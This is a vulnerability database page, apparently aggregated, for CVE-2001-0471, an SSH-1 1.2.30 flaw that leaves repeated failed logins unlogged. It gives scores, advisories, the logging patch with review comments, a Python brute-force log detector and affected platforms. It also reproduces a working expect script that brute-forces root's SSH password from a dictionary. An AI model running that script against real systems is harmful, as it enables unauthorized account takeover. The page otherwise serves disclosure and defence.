CVE-2001-0471
CVSS 7.5
Published: 2001-06-27 00:00:00
Revised: 2008-09-05 16:24:11

[Original] SSH daemon version 1 (aka SSHD-1 or SSH-1) 1.2.30 and earlier does not log repeated login attempts, which could allow remote attackers to compromise accounts without detection via a brute force attack.


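[CNNVD] SSH1 SSH daemon login failure vulnerability (CNNVD-200106-166)

        SSH daemon 1 (also known as SSHD-1 or SSH-1) 1.2.30 and earlier does not log repeated login attempts. Remote attackers can use a brute force attack to compromise accounts without detection.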

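- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definition found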

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0471
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0471
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-166
(Official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/2345
(VENDOR_ADVISORY)  BID  2345
http://www.securityfocus.com/archive/1/160648
(VENDOR_ADVISORY)  BUGTRAQ  20010205 SSHD-1 Logging Vulnerability

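- Vulnerability information

SSH1 SSH daemon login failure vulnerability
High risk   Design error
2001-06-27 00:00:00 2006-09-05 00:00:00
Remote
        SSH daemon 1 (also known as SSHD-1 or SSH-1) 1.2.30 and earlier does not log repeated login attempts. Remote attackers can use a brute force attack to compromise accounts without detection.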

- Advisories and patches

        Patch supplied by Jose Nazario <jose@crimelabs.net>:
        --- ssh-1.2.30/sshd.c.orig Wed Jan 31 12:11:08 2001
        +++ ssh-1.2.30/sshd.c Wed Jan 31 12:57:36 2001
        @@ -2408,7 +2408,7 @@
         remote_user_name = client_user;
         break;
         }
        - debug("Rhosts authentication failed for '%.100s', remote '%.100s', host '%.200s'.",
        + log_msg("Rhosts authentication failed for '%.100s', remote '%.100s', host '%.200s'.",
         user, client_user, get_canonical_hostname());
         xfree(client_user);
         break;
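
Review bot: The promoted log_msg() call in the Rhosts failure path now writes client_user, a value chosen by the remote client, to the system log. The %.100s bound limits its length but not its content, so confirm that log_msg() strips or escapes control characters and newlines, or sanitize client_user before this call, so that a crafted remote user name cannot forge extra log lines.
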
        @@ -2469,7 +2469,7 @@
         mpz_clear(&client_host_key_n);
         break;
         }
        - debug("RhostsRSA authentication failed for '%.100s', remote '%.100s', host '%.200s'.",
        + log_msg("RhostsRSA authentication failed for '%.100s', remote '%.100s', host '%.200s'.",
         user, client_user, get_canonical_hostname());
         xfree(client_user);
         mpz_clear(&client_host_key_e);
        @@ -2500,7 +2500,7 @@
         break;
         }
         mpz_clear(&n);
        - debug("RSA authentication for %.100s failed.", user);
        + log_msg("RSA authentication for %.100s failed.", user);
         }
         break;
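
Review bot: The RSA failure message has no source host: "RSA authentication for %.100s failed." carries only user, while the Rhosts and RhostsRSA messages include get_canonical_hostname(). Now that this line reaches the log, add the host as a second argument so repeated failures can be attributed to a source and not just to the targeted account.
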
        @@ -2633,7 +2633,7 @@
         authenticated = 1;
         break;
         } else {
        - debug("TIS authentication for %.100s failed",user);
        + log_msg("TIS authentication for %.100s failed",user);
         memset(password, 0, strlen(password));
         xfree(password);
         break;
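
Review bot: Style point on the TIS message: it ends without a period and the call is written `failed",user` with no space after the comma, unlike the other five messages in this patch. Since the text is now a log line that monitoring rules will match on, make the punctuation consistent with the RSA and Password messages, and fix the spacing while the line is being touched.
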
        @@ -2672,7 +2672,7 @@
         if (password_attempts > 0)
         {
         /* Log failures if attempted more than once. */
        - debug("Password authentication failed for user %.100s from %.100s.",
        + log_msg("Password authentication failed for user %.100s from %.100s.",
        user, get_canonical_hostname());
         }
         password_attempts++;
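
Review bot: The `if (password_attempts > 0)` guard around this message is left unchanged, so the call is still skipped on the first attempt, and the comment "Log failures if attempted more than once" still describes that. If the intent of the patch is that every failed password attempt is recorded, either drop the guard or update the comment to state why the first attempt is excluded here.
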
        @@ -2693,7 +2693,7 @@
         authenticated = 1;
         break;
         }
        - debug("Password authentication for %.100s failed.", user);
        + log_msg("Password authentication for %.100s failed.", user);
         memset(password, 0, strlen(password));
         xfree(password);
         break;
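
Review bot: This message duplicates the one promoted at -2672 with different wording and less information: "Password authentication for %.100s failed." has no host, while "Password authentication failed for user %.100s from %.100s." does. With both now going to the log, a repeated failure can be reported in two formats. Suggest a single message per failure that includes get_canonical_hostname(), and removing the other call.
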
        SSH Communications Security SSH 1.2.30
        

- Vulnerability information (20615)

SSH 1.2.30 Daemon Logging Failure Vulnerability (EDBID:20615)
unix remote
2001-02-05 Verified
0 Jose Nazario
N/A
source: http://www.securityfocus.com/bid/2345/info

SSH1 is the implementation of the Secure Shell communication protocol by SSH Communications. SSH1 is version 1 of the protocol specified by IETF draft to protect the integrity of traffic over the network.

A problem with the implementation of the SSH1 daemon could allow an attacker to by-pass numerous attempts at brute force cracking a system. The logging routine in the SSH1 code does not capture failed attempts beyond the fourth attempt. In a brute force attack scenario, there are numerous successive attempts at logging in as a specific user. This danger is escalated by the SSH1 package allowing remote root logins by default.

It is possible for a remote user with malicious intent to launch a brute force attack against a system and successfully remain unnoticed by system logging utilities beyond the fourth attempted login. By use of this method, it is possible for the remote user to gain access to any account, and potentially the root account. 

#!/usr/bin/expect -f
#
# simple expect exploit to brute force root's password via ssh without
# detection.. see CLABS200101 for info on this exploit.
#
# this is beerware, just buy me a beer at defcon if you like this.
# build your own dictionary, use at your own risk, no warranty, etc.
#
# jose@crimelabs.net		january, 2001
#
set timeout 3
set target [lindex $argv 0]
set dictionary [lindex $argv 1]

if {[llength $argv] !=  2} {
   puts stderr "Usage: $argv0 root@target dictionary\n"
   exit }

set tryPass [open $dictionary r]

foreach passwd [split [read $tryPass] "\n"] {
  spawn ssh $target
  expect ":"
  send "$passwd\n"
  expect "#" { puts "password is $passwd\n" ; exit }
  set id [exp_pid]
  exec kill -INT $id
}
		

- Vulnerability information

8038
SSH-1 Account Login Attempt Logging Failure
Remote / Network Access Other
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- Vulnerability description

SSH Daemon does not log repeated login attempts. An attacker can use this to attempt to brute force the accounts on this system resulting in a loss of integrity.

- Timeline

2001-02-05 Unknown
2001-02-05 Unknown

- Solution

Upgrade to version 1.2.31 or higher, as it has been reported to fix this vulnerability.
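
Once failed logins reach the system log, repeated failures can be counted per account and per source. The following is an added example, not code from the advisory or from SSH Communications: it matches the message wordings of the log_msg() calls in the patch on this page, and shows that the host-less messages can only be attributed to the targeted account. The sample lines, their syslog prefix, the host names and the threshold of 5 are constructed assumptions.

```python
import re
from collections import Counter

# Failure wordings copied from the log_msg() calls in the patch on this page.
# Only the Rhosts/RhostsRSA lines and one Password line name the remote host.
PATTERNS = [
    re.compile(r"(?P<method>Rhosts|RhostsRSA) authentication failed for "
               r"'(?P<user>[^']*)', remote '[^']*', host '(?P<host>[^']*)'\."),
    re.compile(r"(?P<method>Password) authentication failed for user "
               r"(?P<user>\S+) from (?P<host>\S+)\.$"),
    re.compile(r"(?P<method>RSA|TIS|Password) authentication for "
               r"(?P<user>\S+) failed\.?$"),
]

def parse_failure(line):
    """Return (method, user, host or None) for a failed-auth line, else None."""
    for pat in PATTERNS:
        m = pat.search(line.strip())
        if m:
            d = m.groupdict()
            return d["method"], d["user"], d.get("host")
    return None

def brute_force_suspects(lines, threshold=5):
    """Return (users, hosts) whose failure count reaches the threshold."""
    by_user, by_host = Counter(), Counter()
    for line in lines:
        hit = parse_failure(line)
        if hit is None:
            continue
        _, user, host = hit
        by_user[user] += 1
        if host:  # host-less messages can only be attributed to the account
            by_host[host] += 1
    return ({u for u, n in by_user.items() if n >= threshold},
            {h for h, n in by_host.items() if n >= threshold})

# Constructed sample; the "date host sshd[pid]:" prefix is an assumption.
P = "Feb  5 12:00:01 srv sshd[411]: "
SAMPLE = (
    [P + "Password authentication for root failed."] * 6
    + [P + "Password authentication failed for user root from scan.example.net."] * 5
    + [P + "TIS authentication for alice failed",
       P + "Rhosts authentication failed for 'bob', remote 'eve', host 'lab.example.org'.",
       P + "Generating 768 bit RSA key."]
)

if __name__ == "__main__":
    print(brute_force_suspects(SAMPLE))
```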

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

SSH1 SSH Daemon Logging Failure Vulnerability
Design Error 2345
Yes No
2001-02-05 12:00:00 2009-07-11 04:46:00
This vulnerability was announced to Bugtraq by Jose Nazario <jose@crimelabs.net> in a Crimelabs Security Note on February 5, 2001.

- Affected software versions

SSH Communications Security SSH 1.2.30
- BSDI BSD/OS 4.0.1
- BSDI BSD/OS 4.0
- BSDI BSD/OS 3.1
- Caldera OpenLinux 2.4
- Debian Linux 2.2
- Digital (Compaq) TRU64/DIGITAL UNIX 5.0
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 g
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 3.5.1
- HP HP-UX 11.11
- HP HP-UX 11.0
- HP HP-UX 10.20
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- OpenBSD OpenBSD 2.8
- Red Hat Linux 6.2
- RedHat Linux 7.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- SCO eDesktop 2.4
- SCO eServer 2.3.1
- Sun Solaris 2.5.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6

- Exploit

Exploit contributed by Jose Nazario <jose@crimelabs.net>.

- Related references